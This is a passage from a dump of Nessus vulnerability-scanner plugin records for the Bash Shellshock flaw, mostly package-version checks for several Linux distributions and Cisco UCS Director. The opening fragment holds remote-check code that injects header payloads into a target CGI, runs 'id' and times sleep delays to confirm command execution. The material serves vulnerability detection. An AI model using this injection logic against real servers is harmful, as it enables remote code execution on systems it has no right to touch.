pregmatch(pattern:\"(\"+exploit[\"pattern\"]+\")\", string:res[2]);\n if (isnull(match) || empty_or_null(match[1])) output = chomp(res[2]);\n else output = match[1];\n\n # Try and run id if our above request was a success\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, exploit[\"followup\"]),\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res2[2]))\n {\n attack_req = http_last_sent_request();\n match2 = pregmatch(pattern:\"(uid=[0-9]+.*gid=[0-9]+.*)\",string:res2[2]);\n\n if (isnull(match2) || empty_or_null(match2[1])) output = chomp(res2[2]);\n else output = match2[1];\n }\n }\n else if ( report_paranoia == 2 && exploit[\"type\"] == EXPLOIT_TYPE_WAIT && now - then >= WaitTime )\n {\n InitialDelta = now - then;\n attack_req = http_last_sent_request();\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n WaitTime1 = WaitTime;\n vuln = TRUE;\n\n # Test again with sleep set to 5, 10, and 15\n wtimes = make_list(5, 10, 15);\n\n for ( i = 0 ; i < max_index(wtimes) && vuln == TRUE; i ++ )\n {\n WaitTime1 = wtimes[i];\n http_set_read_timeout(WaitTime1 * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime1), string:exploit[\"payload\"]);\n then1 = unixtime();\n res = http_send_recv3(method : \"GET\", port : port, item : cgi, add_headers : make_array(header, payload), exit_on_fail : FALSE);\n now1 = unixtime();\n\n if ( now1 - then1 >= WaitTime1 && now1 - then1 <= (WaitTime1 + 5 ))\n {\n attack_req = http_last_sent_request();\n InitialDelta = now1 - then1;\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n continue;\n }\n else\n {\n\tvuln = FALSE;\n }\n }\n }\n if (vuln) break;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\n\nif (!vuln) exit(0, \"The web server listening on port \"+port+\" is not affected.\");\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 2,\n request : make_list(attack_req),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:37", "description": "According to its self-reported version, the remote host is running a version of Cisco UCS Director that could be affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can be exploited.", "cvss3": {}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "Cisco UCS Director Code Injection (CSCur02877) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "href": "https://www.tenable.com/plugins/nessus/78770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78770);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco UCS Director Code Injection (CSCur02877) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a vulnerable version of Bash.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote host is running a\nversion of Cisco UCS Director that could be affected by a command\ninjection vulnerability in GNU Bash known as Shellshock, which is due\nto the processing of trailing strings after function definitions in\nthe values of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can\nbe exploited.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02877\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or upgrade to the version recommended in Cisco bug ID\nCSCur02877\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nchckver = get_kb_item_or_exit(\"Host/Cisco/UCSDirector/version\");\n# Could be unknown version because the WebUI can be detected but\n# no version information could be retrieved.\nif (chckver == UNKNOWN_VER) audit(AUDIT_UNKNOWN_DEVICE_VER, \"Cisco UCS Director\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n (\n ver_compare(ver:chckver, fix:\"4.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"4.1.0.5\", strict:FALSE) <= 0\n ) ||\n (\n ver_compare(ver:chckver, fix:\"5.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"5.0.0.2\", strict:FALSE) < 0\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (chckver =~ \"^5\\.\")\n fix = '5.0.0.0 with hotfix cucsd_5_0_0_0_bash_hotfix / 5.0.0.2 / 5.1.0.0';\n else\n fix = '4.1.0.5 with hotfix cucsd_4_1_0_5_bash_hotfix';\n\n report =\n '\\n Installed version : ' + chckver +\n '\\n Fixed version (s) : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:30", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-268-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77877);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"SSA\", value:\"2014-268-01\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?663404aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:37", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux:13.0"], "id": "SLACKWARE_SSA_2014-268-02.NASL", "href": "https://www.tenable.com/plugins/nessus/77878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77878);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"SSA\", value:\"2014-268-02\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0 to fix a security\nissue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45f8fb5f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"3_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"3_slack13.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:25", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 2.2 : bash (OVMSA-2014-0024)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:2.2"], "id": "ORACLEVM_OVMSA-2014-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/78239", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0024.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78239);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 2.2 : bash (OVMSA-2014-0024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000224.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f04c161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:43", "description": "Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : bash (ELSA-2014-3076)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-3076.NASL", "href": "https://www.tenable.com/plugins/nessus/77892", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3076.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77892);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 7 : bash (ELSA-2014-3076)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004479.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2.0.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:30", "description": "Tavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability 